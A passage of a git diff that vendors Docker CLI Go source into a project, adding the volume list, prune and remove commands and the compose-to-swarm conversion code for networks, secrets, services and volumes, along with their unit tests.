opts.FilterOpt +} + +func newListCommand(dockerCli *command.DockerCli) *cobra.Command { + opts := listOptions{filter: opts.NewFilterOpt()} + + cmd := &cobra.Command{ + Use: "ls [OPTIONS]", + Aliases: []string{"list"}, + Short: "List volumes", + Long: listDescription, + Args: cli.NoArgs, + RunE: func(cmd *cobra.Command, args []string) error { + return runList(dockerCli, opts) + }, + } + + flags := cmd.Flags() + flags.BoolVarP(&opts.quiet, "quiet", "q", false, "Only display volume names") + flags.StringVar(&opts.format, "format", "", "Pretty-print volumes using a Go template") + flags.VarP(&opts.filter, "filter", "f", "Provide filter values (e.g. 'dangling=true')") + + return cmd +} + +func runList(dockerCli *command.DockerCli, opts listOptions) error { + client := dockerCli.Client() + volumes, err := client.VolumeList(context.Background(), opts.filter.Value()) + if err != nil { + return err + } + + format := opts.format + if len(format) == 0 { + if len(dockerCli.ConfigFile().VolumesFormat) > 0 && !opts.quiet { + format = dockerCli.ConfigFile().VolumesFormat + } else { + format = formatter.TableFormatKey + } + } + + sort.Sort(byVolumeName(volumes.Volumes)) + + volumeCtx := formatter.Context{ + Output: dockerCli.Out(), + Format: formatter.NewVolumeFormat(format, opts.quiet), + } + return formatter.VolumeWrite(volumeCtx, volumes.Volumes) +} + +var listDescription = ` + +Lists all the volumes Docker manages. You can filter using the **-f** or +**--filter** flag. The filtering format is a **key=value** pair. To specify +more than one filter, pass multiple flags (for example, +**--filter "foo=bar" --filter "bif=baz"**) + +The currently supported filters are: + +* **dangling** (boolean - **true** or **false**, **1** or **0**) +* **driver** (a volume driver's name) +* **label** (**label=** or **label==**) +* **name** (a volume's name) + +` diff --git a/vendor/github.com/docker/docker/cli/command/volume/prune.go b/vendor/github.com/docker/docker/cli/command/volume/prune.go new file mode 100644 index 0000000000..405fbeb295 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/volume/prune.go @@ -0,0 +1,75 @@ +package volume + +import ( + "fmt" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + units "github.com/docker/go-units" + "github.com/spf13/cobra" +) + +type pruneOptions struct { + force bool +} + +// NewPruneCommand returns a new cobra prune command for volumes +func NewPruneCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts pruneOptions + + cmd := &cobra.Command{ + Use: "prune [OPTIONS]", + Short: "Remove all unused volumes", + Args: cli.NoArgs, + RunE: func(cmd *cobra.Command, args []string) error { + spaceReclaimed, output, err := runPrune(dockerCli, opts) + if err != nil { + return err + } + if output != "" { + fmt.Fprintln(dockerCli.Out(), output) + } + fmt.Fprintln(dockerCli.Out(), "Total reclaimed space:", units.HumanSize(float64(spaceReclaimed))) + return nil + }, + Tags: map[string]string{"version": "1.25"}, + } + + flags := cmd.Flags() + flags.BoolVarP(&opts.force, "force", "f", false, "Do not prompt for confirmation") + + return cmd +} + +const warning = `WARNING! This will remove all volumes not used by at least one container. +Are you sure you want to continue?` + +func runPrune(dockerCli *command.DockerCli, opts pruneOptions) (spaceReclaimed uint64, output string, err error) { + if !opts.force && !command.PromptForConfirmation(dockerCli.In(), dockerCli.Out(), warning) { + return + } + + report, err := dockerCli.Client().VolumesPrune(context.Background(), filters.Args{}) + if err != nil { + return + } + + if len(report.VolumesDeleted) > 0 { + output = "Deleted Volumes:\n" + for _, id := range report.VolumesDeleted { + output += id + "\n" + } + spaceReclaimed = report.SpaceReclaimed + } + + return +} + +// RunPrune calls the Volume Prune API +// This returns the amount of space reclaimed and a detailed output string +func RunPrune(dockerCli *command.DockerCli) (uint64, string, error) { + return runPrune(dockerCli, pruneOptions{force: true}) +} diff --git a/vendor/github.com/docker/docker/cli/command/volume/remove.go b/vendor/github.com/docker/docker/cli/command/volume/remove.go new file mode 100644 index 0000000000..f464bb3e1a --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/volume/remove.go @@ -0,0 +1,68 @@ +package volume + +import ( + "fmt" + + "golang.org/x/net/context" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/spf13/cobra" +) + +type removeOptions struct { + force bool + + volumes []string +} + +func newRemoveCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts removeOptions + + cmd := &cobra.Command{ + Use: "rm [OPTIONS] VOLUME [VOLUME...]", + Aliases: []string{"remove"}, + Short: "Remove one or more volumes", + Long: removeDescription, + Example: removeExample, + Args: cli.RequiresMinArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts.volumes = args + return runRemove(dockerCli, &opts) + }, + } + + flags := cmd.Flags() + flags.BoolVarP(&opts.force, "force", "f", false, "Force the removal of one or more volumes") + flags.SetAnnotation("force", "version", []string{"1.25"}) + return cmd +} + +func runRemove(dockerCli *command.DockerCli, opts *removeOptions) error { + client := dockerCli.Client() + ctx := context.Background() + status := 0 + + for _, name := range opts.volumes { + if err := client.VolumeRemove(ctx, name, opts.force); err != nil { + fmt.Fprintf(dockerCli.Err(), "%s\n", err) + status = 1 + continue + } + fmt.Fprintf(dockerCli.Out(), "%s\n", name) + } + + if status != 0 { + return cli.StatusError{StatusCode: status} + } + return nil +} + +var removeDescription = ` +Remove one or more volumes. You cannot remove a volume that is in use by a container. +` + +var removeExample = ` +$ docker volume rm hello +hello +` diff --git a/vendor/github.com/docker/docker/cli/compose/convert/compose.go b/vendor/github.com/docker/docker/cli/compose/convert/compose.go new file mode 100644 index 0000000000..8122326aa5 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/compose/convert/compose.go @@ -0,0 +1,116 @@ +package convert + +import ( + "io/ioutil" + + "github.com/docker/docker/api/types" + networktypes "github.com/docker/docker/api/types/network" + "github.com/docker/docker/api/types/swarm" + composetypes "github.com/docker/docker/cli/compose/types" +) + +const ( + // LabelNamespace is the label used to track stack resources + LabelNamespace = "com.docker.stack.namespace" +) + +// Namespace mangles names by prepending the name +type Namespace struct { + name string +} + +// Scope prepends the namespace to a name +func (n Namespace) Scope(name string) string { + return n.name + "_" + name +} + +// Name returns the name of the namespace +func (n Namespace) Name() string { + return n.name +} + +// NewNamespace returns a new Namespace for scoping of names +func NewNamespace(name string) Namespace { + return Namespace{name: name} +} + +// AddStackLabel returns labels with the namespace label added +func AddStackLabel(namespace Namespace, labels map[string]string) map[string]string { + if labels == nil { + labels = make(map[string]string) + } + labels[LabelNamespace] = namespace.name + return labels +} + +type networkMap map[string]composetypes.NetworkConfig + +// Networks converts networks from the compose-file type to the engine API type +func Networks( + namespace Namespace, + networks networkMap, + servicesNetworks map[string]struct{}, +) (map[string]types.NetworkCreate, []string) { + if networks == nil { + networks = make(map[string]composetypes.NetworkConfig) + } + + externalNetworks := []string{} + result := make(map[string]types.NetworkCreate) + + for internalName := range servicesNetworks { + network := networks[internalName] + if network.External.External { + externalNetworks = append(externalNetworks, network.External.Name) + continue + } + + createOpts := types.NetworkCreate{ + Labels: AddStackLabel(namespace, network.Labels), + Driver: network.Driver, + Options: network.DriverOpts, + Internal: network.Internal, + } + + if network.Ipam.Driver != "" || len(network.Ipam.Config) > 0 { + createOpts.IPAM = &networktypes.IPAM{} + } + + if network.Ipam.Driver != "" { + createOpts.IPAM.Driver = network.Ipam.Driver + } + for _, ipamConfig := range network.Ipam.Config { + config := networktypes.IPAMConfig{ + Subnet: ipamConfig.Subnet, + } + createOpts.IPAM.Config = append(createOpts.IPAM.Config, config) + } + result[internalName] = createOpts + } + + return result, externalNetworks +} + +// Secrets converts secrets from the Compose type to the engine API type +func Secrets(namespace Namespace, secrets map[string]composetypes.SecretConfig) ([]swarm.SecretSpec, error) { + result := []swarm.SecretSpec{} + for name, secret := range secrets { + if secret.External.External { + continue + } + + data, err := ioutil.ReadFile(secret.File) + if err != nil { + return nil, err + } + + result = append(result, swarm.SecretSpec{ + Annotations: swarm.Annotations{ + Name: namespace.Scope(name), + Labels: AddStackLabel(namespace, secret.Labels), + }, + Data: data, + }) + } + return result, nil +} diff --git a/vendor/github.com/docker/docker/cli/compose/convert/compose_test.go b/vendor/github.com/docker/docker/cli/compose/convert/compose_test.go new file mode 100644 index 0000000000..f333d73fda --- /dev/null +++ b/vendor/github.com/docker/docker/cli/compose/convert/compose_test.go @@ -0,0 +1,122 @@ +package convert + +import ( + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/network" + composetypes "github.com/docker/docker/cli/compose/types" + "github.com/docker/docker/pkg/testutil/assert" + "github.com/docker/docker/pkg/testutil/tempfile" +) + +func TestNamespaceScope(t *testing.T) { + scoped := Namespace{name: "foo"}.Scope("bar") + assert.Equal(t, scoped, "foo_bar") +} + +func TestAddStackLabel(t *testing.T) { + labels := map[string]string{ + "something": "labeled", + } + actual := AddStackLabel(Namespace{name: "foo"}, labels) + expected := map[string]string{ + "something": "labeled", + LabelNamespace: "foo", + } + assert.DeepEqual(t, actual, expected) +} + +func TestNetworks(t *testing.T) { + namespace := Namespace{name: "foo"} + source := networkMap{ + "normal": composetypes.NetworkConfig{ + Driver: "overlay", + DriverOpts: map[string]string{ + "opt": "value", + }, + Ipam: composetypes.IPAMConfig{ + Driver: "driver", + Config: []*composetypes.IPAMPool{ + { + Subnet: "10.0.0.0", + }, + }, + }, + Labels: map[string]string{ + "something": "labeled", + }, + }, + "outside": composetypes.NetworkConfig{ + External: composetypes.External{ + External: true, + Name: "special", + }, + }, + } + expected := map[string]types.NetworkCreate{ + "default": { + Labels: map[string]string{ + LabelNamespace: "foo", + }, + }, + "normal": { + Driver: "overlay", + IPAM: &network.IPAM{ + Driver: "driver", + Config: []network.IPAMConfig{ + { + Subnet: "10.0.0.0", + }, + }, + }, + Options: map[string]string{ + "opt": "value", + }, + Labels: map[string]string{ + LabelNamespace: "foo", + "something": "labeled", + }, + }, + } + + serviceNetworks := map[string]struct{}{ + "default": {}, + "normal": {}, + "outside": {}, + } + networks, externals := Networks(namespace, source, serviceNetworks) + assert.DeepEqual(t, networks, expected) + assert.DeepEqual(t, externals, []string{"special"}) +} + +func TestSecrets(t *testing.T) { + namespace := Namespace{name: "foo"} + + secretText := "this is the first secret" + secretFile := tempfile.NewTempFile(t, "convert-secrets", secretText) + defer secretFile.Remove() + + source := map[string]composetypes.SecretConfig{ + "one": { + File: secretFile.Name(), + Labels: map[string]string{"monster": "mash"}, + }, + "ext": { + External: composetypes.External{ + External: true, + }, + }, + } + + specs, err := Secrets(namespace, source) + assert.NilError(t, err) + assert.Equal(t, len(specs), 1) + secret := specs[0] + assert.Equal(t, secret.Name, "foo_one") + assert.DeepEqual(t, secret.Labels, map[string]string{ + "monster": "mash", + LabelNamespace: "foo", + }) + assert.DeepEqual(t, secret.Data, []byte(secretText)) +} diff --git a/vendor/github.com/docker/docker/cli/compose/convert/service.go b/vendor/github.com/docker/docker/cli/compose/convert/service.go new file mode 100644 index 0000000000..4a5489562c --- /dev/null +++ b/vendor/github.com/docker/docker/cli/compose/convert/service.go @@ -0,0 +1,416 @@ +package convert + +import ( + "fmt" + "os" + "sort" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/api/types/swarm" + servicecli "github.com/docker/docker/cli/command/service" + composetypes "github.com/docker/docker/cli/compose/types" + "github.com/docker/docker/client" + "github.com/docker/docker/opts" + runconfigopts "github.com/docker/docker/runconfig/opts" + "github.com/docker/go-connections/nat" +) + +// Services from compose-file types to engine API types +// TODO: fix secrets API so that SecretAPIClient is not required here +func Services( + namespace Namespace, + config *composetypes.Config, + client client.SecretAPIClient, +) (map[string]swarm.ServiceSpec, error) { + result := make(map[string]swarm.ServiceSpec) + + services := config.Services + volumes := config.Volumes + networks := config.Networks + + for _, service := range services { + + secrets, err := convertServiceSecrets(client, namespace, service.Secrets, config.Secrets) + if err != nil { + return nil, err + } + serviceSpec, err := convertService(namespace, service, networks, volumes, secrets) + if err != nil { + return nil, err + } + result[service.Name] = serviceSpec + } + + return result, nil +} + +func convertService( + namespace Namespace, + service composetypes.ServiceConfig, + networkConfigs map[string]composetypes.NetworkConfig, + volumes map[string]composetypes.VolumeConfig, + secrets []*swarm.SecretReference, +) (swarm.ServiceSpec, error) { + name := namespace.Scope(service.Name) + + endpoint, err := convertEndpointSpec(service.Ports) + if err != nil { + return swarm.ServiceSpec{}, err + } + + mode, err := convertDeployMode(service.Deploy.Mode, service.Deploy.Replicas) + if err != nil { + return swarm.ServiceSpec{}, err + } + + mounts, err := Volumes(service.Volumes, volumes, namespace) + if err != nil { + // TODO: better error message (include service name) + return swarm.ServiceSpec{}, err + } + + resources, err := convertResources(service.Deploy.Resources) + if err != nil { + return swarm.ServiceSpec{}, err + } + + restartPolicy, err := convertRestartPolicy( + service.Restart, service.Deploy.RestartPolicy) + if err != nil { + return swarm.ServiceSpec{}, err + } + + healthcheck, err := convertHealthcheck(service.HealthCheck) + if err != nil { + return swarm.ServiceSpec{}, err + } + + networks, err := convertServiceNetworks(service.Networks, networkConfigs, namespace, service.Name) + if err != nil { + return swarm.ServiceSpec{}, err + } + + var logDriver *swarm.Driver + if service.Logging != nil { + logDriver = &swarm.Driver{ + Name: service.Logging.Driver, + Options: service.Logging.Options, + } + } + + serviceSpec := swarm.ServiceSpec{ + Annotations: swarm.Annotations{ + Name: name, + Labels: AddStackLabel(namespace, service.Deploy.Labels), + }, + TaskTemplate: swarm.TaskSpec{ + ContainerSpec: swarm.ContainerSpec{ + Image: service.Image, + Command: service.Entrypoint, + Args: service.Command, + Hostname: service.Hostname, + Hosts: sortStrings(convertExtraHosts(service.ExtraHosts)), + Healthcheck: healthcheck, + Env: sortStrings(convertEnvironment(service.Environment)), + Labels: AddStackLabel(namespace, service.Labels), + Dir: service.WorkingDir, + User: service.User, + Mounts: mounts, + StopGracePeriod: service.StopGracePeriod, + TTY: service.Tty, + OpenStdin: service.StdinOpen, + Secrets: secrets, + }, + LogDriver: logDriver, + Resources: resources, + RestartPolicy: restartPolicy, + Placement: &swarm.Placement{ + Constraints: service.Deploy.Placement.Constraints, + }, + }, + EndpointSpec: endpoint, + Mode: mode, + Networks: networks, + UpdateConfig: convertUpdateConfig(service.Deploy.UpdateConfig), + } + + return serviceSpec, nil +} + +func sortStrings(strs []string) []string { + sort.Strings(strs) + return strs +} + +type byNetworkTarget []swarm.NetworkAttachmentConfig + +func (a byNetworkTarget) Len() int { return len(a) } +func (a byNetworkTarget) Swap(i, j int) { a[i], a[j] = a[j], a[i] } +func (a byNetworkTarget) Less(i, j int) bool { return a[i].Target < a[j].Target } + +func convertServiceNetworks( + networks map[string]*composetypes.ServiceNetworkConfig, + networkConfigs networkMap, + namespace Namespace, + name string, +) ([]swarm.NetworkAttachmentConfig, error) { + if len(networks) == 0 { + return []swarm.NetworkAttachmentConfig{ + { + Target: namespace.Scope("default"), + Aliases: []string{name}, + }, + }, nil + } + + nets := []swarm.NetworkAttachmentConfig{} + for networkName, network := range networks { + networkConfig, ok := networkConfigs[networkName] + if !ok { + return []swarm.NetworkAttachmentConfig{}, fmt.Errorf( + "service %q references network %q, which is not declared", name, networkName) + } + var aliases []string + if network != nil { + aliases = network.Aliases + } + target := namespace.Scope(networkName) + if networkConfig.External.External { + target = networkConfig.External.Name + } + nets = append(nets, swarm.NetworkAttachmentConfig{ + Target: target, + Aliases: append(aliases, name), + }) + } + + sort.Sort(byNetworkTarget(nets)) + + return nets, nil +} + +// TODO: fix secrets API so that SecretAPIClient is not required here +func convertServiceSecrets( + client client.SecretAPIClient, + namespace Namespace, + secrets []composetypes.ServiceSecretConfig, + secretSpecs map[string]composetypes.SecretConfig, +) ([]*swarm.SecretReference, error) { + opts := []*types.SecretRequestOption{} + for _, secret := range secrets { + target := secret.Target + if target == "" { + target = secret.Source + } + + source := namespace.Scope(secret.Source) + secretSpec := secretSpecs[secret.Source] + if secretSpec.External.External { + source = secretSpec.External.Name + } + + uid := secret.UID + gid := secret.GID + if uid == "" { + uid = "0" + } + if gid == "" { + gid = "0" + } + + opts = append(opts, &types.SecretRequestOption{ + Source: source, + Target: target, + UID: uid, + GID: gid, + Mode: os.FileMode(secret.Mode), + }) + } + + return servicecli.ParseSecrets(client, opts) +} + +func convertExtraHosts(extraHosts map[string]string) []string { + hosts := []string{} + for host, ip := range extraHosts { + hosts = append(hosts, fmt.Sprintf("%s %s", ip, host)) + } + return hosts +} + +func convertHealthcheck(healthcheck *composetypes.HealthCheckConfig) (*container.HealthConfig, error) { + if healthcheck == nil { + return nil, nil + } + var ( + err error + timeout, interval time.Duration + retries int + ) + if healthcheck.Disable { + if len(healthcheck.Test) != 0 { + return nil, fmt.Errorf("test and disable can't be set at the same time") + } + return &container.HealthConfig{ + Test: []string{"NONE"}, + }, nil + + } + if healthcheck.Timeout != "" { + timeout, err = time.ParseDuration(healthcheck.Timeout) + if err != nil { + return nil, err + } + } + if healthcheck.Interval != "" { + interval, err = time.ParseDuration(healthcheck.Interval) + if err != nil { + return nil, err + } + } + if healthcheck.Retries != nil { + retries = int(*healthcheck.Retries) + } + return &container.HealthConfig{ + Test: healthcheck.Test, + Timeout: timeout, + Interval: interval, + Retries: retries, + }, nil +} + +func convertRestartPolicy(restart string, source *composetypes.RestartPolicy) (*swarm.RestartPolicy, error) { + // TODO: log if restart is being ignored + if source == nil { + policy, err := runconfigopts.ParseRestartPolicy(restart) + if err != nil { + return nil, err + } + switch { + case policy.IsNone(): + return nil, nil + case policy.IsAlways(), policy.IsUnlessStopped(): + return &swarm.RestartPolicy{ + Condition: swarm.RestartPolicyConditionAny, + }, nil + case policy.IsOnFailure(): + attempts := uint64(policy.MaximumRetryCount) + return &swarm.RestartPolicy{ + Condition: swarm.RestartPolicyConditionOnFailure, + MaxAttempts: &attempts, + }, nil + default: + return nil, fmt.Errorf("unknown restart policy: %s", restart) + } + } + return &swarm.RestartPolicy{ + Condition: swarm.RestartPolicyCondition(source.Condition), + Delay: source.Delay, + MaxAttempts: source.MaxAttempts, + Window: source.Window, + }, nil +} + +func convertUpdateConfig(source *composetypes.UpdateConfig) *swarm.UpdateConfig { + if source == nil { + return nil + } + parallel := uint64(1) + if source.Parallelism != nil { + parallel = *source.Parallelism + } + return &swarm.UpdateConfig{ + Parallelism: parallel, + Delay: source.Delay, + FailureAction: source.FailureAction, + Monitor: source.Monitor, + MaxFailureRatio: source.MaxFailureRatio, + } +} + +func convertResources(source composetypes.Resources) (*swarm.ResourceRequirements, error) { + resources := &swarm.ResourceRequirements{} + var err error + if source.Limits != nil { + var cpus int64 + if source.Limits.NanoCPUs != "" { + cpus, err = opts.ParseCPUs(source.Limits.NanoCPUs) + if err != nil { + return nil, err + } + } + resources.Limits = &swarm.Resources{ + NanoCPUs: cpus, + MemoryBytes: int64(source.Limits.MemoryBytes), + } + } + if source.Reservations != nil { + var cpus int64 + if source.Reservations.NanoCPUs != "" { + cpus, err = opts.ParseCPUs(source.Reservations.NanoCPUs) + if err != nil { + return nil, err + } + } + resources.Reservations = &swarm.Resources{ + NanoCPUs: cpus, + MemoryBytes: int64(source.Reservations.MemoryBytes), + } + } + return resources, nil + +} + +type byPublishedPort []swarm.PortConfig + +func (a byPublishedPort) Len() int { return len(a) } +func (a byPublishedPort) Swap(i, j int) { a[i], a[j] = a[j], a[i] } +func (a byPublishedPort) Less(i, j int) bool { return a[i].PublishedPort < a[j].PublishedPort } + +func convertEndpointSpec(source []string) (*swarm.EndpointSpec, error) { + portConfigs := []swarm.PortConfig{} + ports, portBindings, err := nat.ParsePortSpecs(source) + if err != nil { + return nil, err + } + + for port := range ports { + portConfigs = append( + portConfigs, + opts.ConvertPortToPortConfig(port, portBindings)...) + } + + // Sorting to make sure these are always in the same order + sort.Sort(byPublishedPort(portConfigs)) + + return &swarm.EndpointSpec{Ports: portConfigs}, nil +} + +func convertEnvironment(source map[string]string) []string { + var output []string + + for name, value := range source { + output = append(output, fmt.Sprintf("%s=%s", name, value)) + } + + return output +} + +func convertDeployMode(mode string, replicas *uint64) (swarm.ServiceMode, error) { + serviceMode := swarm.ServiceMode{} + + switch mode { + case "global": + if replicas != nil { + return serviceMode, fmt.Errorf("replicas can only be used with replicated mode") + } + serviceMode.Global = &swarm.GlobalService{} + case "replicated", "": + serviceMode.Replicated = &swarm.ReplicatedService{Replicas: replicas} + default: + return serviceMode, fmt.Errorf("Unknown mode: %s", mode) + } + return serviceMode, nil +} diff --git a/vendor/github.com/docker/docker/cli/compose/convert/service_test.go b/vendor/github.com/docker/docker/cli/compose/convert/service_test.go new file mode 100644 index 0000000000..2e614d730c --- /dev/null +++ b/vendor/github.com/docker/docker/cli/compose/convert/service_test.go @@ -0,0 +1,216 @@ +package convert + +import ( + "sort" + "strings" + "testing" + "time" + + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/api/types/swarm" + composetypes "github.com/docker/docker/cli/compose/types" + "github.com/docker/docker/pkg/testutil/assert" +) + +func TestConvertRestartPolicyFromNone(t *testing.T) { + policy, err := convertRestartPolicy("no", nil) + assert.NilError(t, err) + assert.Equal(t, policy, (*swarm.RestartPolicy)(nil)) +} + +func TestConvertRestartPolicyFromUnknown(t *testing.T) { + _, err := convertRestartPolicy("unknown", nil) + assert.Error(t, err, "unknown restart policy: unknown") +} + +func TestConvertRestartPolicyFromAlways(t *testing.T) { + policy, err := convertRestartPolicy("always", nil) + expected := &swarm.RestartPolicy{ + Condition: swarm.RestartPolicyConditionAny, + } + assert.NilError(t, err) + assert.DeepEqual(t, policy, expected) +} + +func TestConvertRestartPolicyFromFailure(t *testing.T) { + policy, err := convertRestartPolicy("on-failure:4", nil) + attempts := uint64(4) + expected := &swarm.RestartPolicy{ + Condition: swarm.RestartPolicyConditionOnFailure, + MaxAttempts: &attempts, + } + assert.NilError(t, err) + assert.DeepEqual(t, policy, expected) +} + +func TestConvertEnvironment(t *testing.T) { + source := map[string]string{ + "foo": "bar", + "key": "value", + } + env := convertEnvironment(source) + sort.Strings(env) + assert.DeepEqual(t, env, []string{"foo=bar", "key=value"}) +} + +func TestConvertResourcesFull(t *testing.T) { + source := composetypes.Resources{ + Limits: &composetypes.Resource{ + NanoCPUs: "0.003", + MemoryBytes: composetypes.UnitBytes(300000000), + }, + Reservations: &composetypes.Resource{ + NanoCPUs: "0.002", + MemoryBytes: composetypes.UnitBytes(200000000), + }, + } + resources, err := convertResources(source) + assert.NilError(t, err) + + expected := &swarm.ResourceRequirements{ + Limits: &swarm.Resources{ + NanoCPUs: 3000000, + MemoryBytes: 300000000, + }, + Reservations: &swarm.Resources{ + NanoCPUs: 2000000, + MemoryBytes: 200000000, + }, + } + assert.DeepEqual(t, resources, expected) +} + +func TestConvertResourcesOnlyMemory(t *testing.T) { + source := composetypes.Resources{ + Limits: &composetypes.Resource{ + MemoryBytes: composetypes.UnitBytes(300000000), + }, + Reservations: &composetypes.Resource{ + MemoryBytes: composetypes.UnitBytes(200000000), + }, + } + resources, err := convertResources(source) + assert.NilError(t, err) + + expected := &swarm.ResourceRequirements{ + Limits: &swarm.Resources{ + MemoryBytes: 300000000, + }, + Reservations: &swarm.Resources{ + MemoryBytes: 200000000, + }, + } + assert.DeepEqual(t, resources, expected) +} + +func TestConvertHealthcheck(t *testing.T) { + retries := uint64(10) + source := &composetypes.HealthCheckConfig{ + Test: []string{"EXEC", "touch", "/foo"}, + Timeout: "30s", + Interval: "2ms", + Retries: &retries, + } + expected := &container.HealthConfig{ + Test: source.Test, + Timeout: 30 * time.Second, + Interval: 2 * time.Millisecond, + Retries: 10, + } + + healthcheck, err := convertHealthcheck(source) + assert.NilError(t, err) + assert.DeepEqual(t, healthcheck, expected) +} + +func TestConvertHealthcheckDisable(t *testing.T) { + source := &composetypes.HealthCheckConfig{Disable: true} + expected := &container.HealthConfig{ + Test: []string{"NONE"}, + } + + healthcheck, err := convertHealthcheck(source) + assert.NilError(t, err) + assert.DeepEqual(t, healthcheck, expected) +} + +func TestConvertHealthcheckDisableWithTest(t *testing.T) { + source := &composetypes.HealthCheckConfig{ + Disable: true, + Test: []string{"EXEC", "touch"}, + } + _, err := convertHealthcheck(source) + assert.Error(t, err, "test and disable can't be set") +} + +func TestConvertServiceNetworksOnlyDefault(t *testing.T) { + networkConfigs := networkMap{} + networks := map[string]*composetypes.ServiceNetworkConfig{} + + configs, err := convertServiceNetworks( + networks, networkConfigs, NewNamespace("foo"), "service") + + expected := []swarm.NetworkAttachmentConfig{ + { + Target: "foo_default", + Aliases: []string{"service"}, + }, + } + + assert.NilError(t, err) + assert.DeepEqual(t, configs, expected) +} + +func TestConvertServiceNetworks(t *testing.T) { + networkConfigs := networkMap{ + "front": composetypes.NetworkConfig{ + External: composetypes.External{ + External: true, + Name: "fronttier", + }, + }, + "back": composetypes.NetworkConfig{}, + } + networks := map[string]*composetypes.ServiceNetworkConfig{ + "front": { + Aliases: []string{"something"}, + }, + "back": { + Aliases: []string{"other"}, + }, + } + + configs, err := convertServiceNetworks( + networks, networkConfigs, NewNamespace("foo"), "service") + + expected := []swarm.NetworkAttachmentConfig{ + { + Target: "foo_back", + Aliases: []string{"other", "service"}, + }, + { + Target: "fronttier", + Aliases: []string{"something", "service"}, + }, + } + + sortedConfigs := byTargetSort(configs) + sort.Sort(&sortedConfigs) + + assert.NilError(t, err) + assert.DeepEqual(t, []swarm.NetworkAttachmentConfig(sortedConfigs), expected) +} + +type byTargetSort []swarm.NetworkAttachmentConfig + +func (s byTargetSort) Len() int { + return len(s) +} + +func (s byTargetSort) Less(i, j int) bool { + return strings.Compare(s[i].Target, s[j].Target) < 0 +} + +func (s byTargetSort) Swap(i, j int) { + s[i], s[j] = s[j], s[i] +} diff --git a/vendor/github.com/docker/docker/cli/compose/convert/volume.go b/vendor/github.com/docker/docker/cli/compose/convert/volume.go new file mode 100644 index 0000000000..24442d4dc7 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/compose/convert/volume.go @@ -0,0 +1,128 @@ +package convert + +import ( + "fmt" + "strings" + + "github.com/docker/docker/api/types/mount" + composetypes "github.com/docker/docker/cli/compose/types" +) + +type volumes map[string]composetypes.VolumeConfig + +// Volumes from compose-file types to engine api types +func Volumes(serviceVolumes []string, stackVolumes volumes, namespace Namespace) ([]mount.Mount, error) { + var mounts []mount.Mount + + for _, volumeSpec := range serviceVolumes { + mount, err := convertVolumeToMount(volumeSpec, stackVolumes, namespace) + if err != nil { + return nil, err + } + mounts = append(mounts, mount) + } + return mounts, nil +} + +func convertVolumeToMount(volumeSpec string, stackVolumes volumes, namespace Namespace) (mount.Mount, error) { + var source, target string + var mode []string + + // TODO: split Windows path mappings properly + parts := strings.SplitN(volumeSpec, ":", 3) + + for _, part := range parts { + if strings.TrimSpace(part) == "" { + return mount.Mount{}, fmt.Errorf("invalid volume: %s", volumeSpec) + } + } + + switch len(parts) { + case 3: + source = parts[0] + target = parts[1] + mode = strings.Split(parts[2], ",") + case 2: + source = parts[0] + target = parts[1] + case 1: + target = parts[0] + } + + if source == "" { + // Anonymous volume + return mount.Mount{ + Type: mount.TypeVolume, + Target: target, + }, nil + } + + // TODO: catch Windows paths here + if strings.HasPrefix(source, "/") { + return mount.Mount{ + Type: mount.TypeBind, + Source: source, + Target: target, + ReadOnly: isReadOnly(mode), + BindOptions: getBindOptions(mode), + }, nil + } + + stackVolume, exists := stackVolumes[source] + if !exists { + return mount.Mount{}, fmt.Errorf("undefined volume: %s", source) + } + + var volumeOptions *mount.VolumeOptions + if stackVolume.External.Name != "" { + source = stackVolume.External.Name + } else { + volumeOptions = &mount.VolumeOptions{ + Labels: AddStackLabel(namespace, stackVolume.Labels), + NoCopy: isNoCopy(mode), + } + + if stackVolume.Driver != "" { + volumeOptions.DriverConfig = &mount.Driver{ + Name: stackVolume.Driver, + Options: stackVolume.DriverOpts, + } + } + source = namespace.Scope(source) + } + return mount.Mount{ + Type: mount.TypeVolume, + Source: source, + Target: target, + ReadOnly: isReadOnly(mode), + VolumeOptions: volumeOptions, + }, nil +} + +func modeHas(mode []string, field string) bool { + for _, item := range mode { + if item == field { + return true + } + } + return false +} + +func isReadOnly(mode []string) bool { + return modeHas(mode, "ro") +} + +func isNoCopy(mode []string) bool { + return modeHas(mode, "nocopy") +} + +func getBindOptions(mode []string) *mount.BindOptions { + for _, item := range mode { + for _, propagation := range mount.Propagations { + if mount.Propagation(item) == propagation { + return &mount.BindOptions{Propagation: mount.Propagation(item)} + } + } + } + return nil +} diff --git a/vendor/github.com/docker/docker/cli/compose/convert/volume_test.go b/vendor/github.com/docker/docker/cli/compose/convert/volume_test.go new file mode 100644 index 0000000000..113ab1e1b6 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/compose/convert/volume_test.go @@ -0,0 +1,133 @@ +package convert + +import ( + "testing" + + "github.com/docker/docker/api/types/mount" + composetypes "github.com/docker/docker/cli/compose/types" + "github.com/docker/docker/pkg/testutil/assert" +) + +func TestIsReadOnly(t *testing.T) { + assert.Equal(t, isReadOnly([]string{"foo", "bar", "ro"}), true) + assert.Equal(t, isReadOnly([]string{"ro"}), true) + assert.Equal(t, isReadOnly([]string{}), false) + assert.Equal(t, isReadOnly([]string{"foo", "rw"}), false) + assert.Equal(t, isReadOnly([]string{"foo"}), false) +} + +func TestIsNoCopy(t *testing.T) { + assert.Equal(t, isNoCopy([]string{"foo", "bar", "nocopy"}), true) + assert.Equal(t, isNoCopy([]string{"nocopy"}), true) + assert.Equal(t, isNoCopy([]string{}), false) + assert.Equal(t, isNoCopy([]string{"foo", "rw"}), false) +} + +func TestGetBindOptions(t *testing.T) { + opts := getBindOptions([]string{"slave"}) + expected := mount.BindOptions{Propagation: mount.PropagationSlave} + assert.Equal(t, *opts, expected) +} + +func TestGetBindOptionsNone(t *testing.T) { + opts := getBindOptions([]string{"ro"}) + assert.Equal(t, opts, (*mount.BindOptions)(nil)) +} + +func TestConvertVolumeToMountNamedVolume(t *testing.T) { + 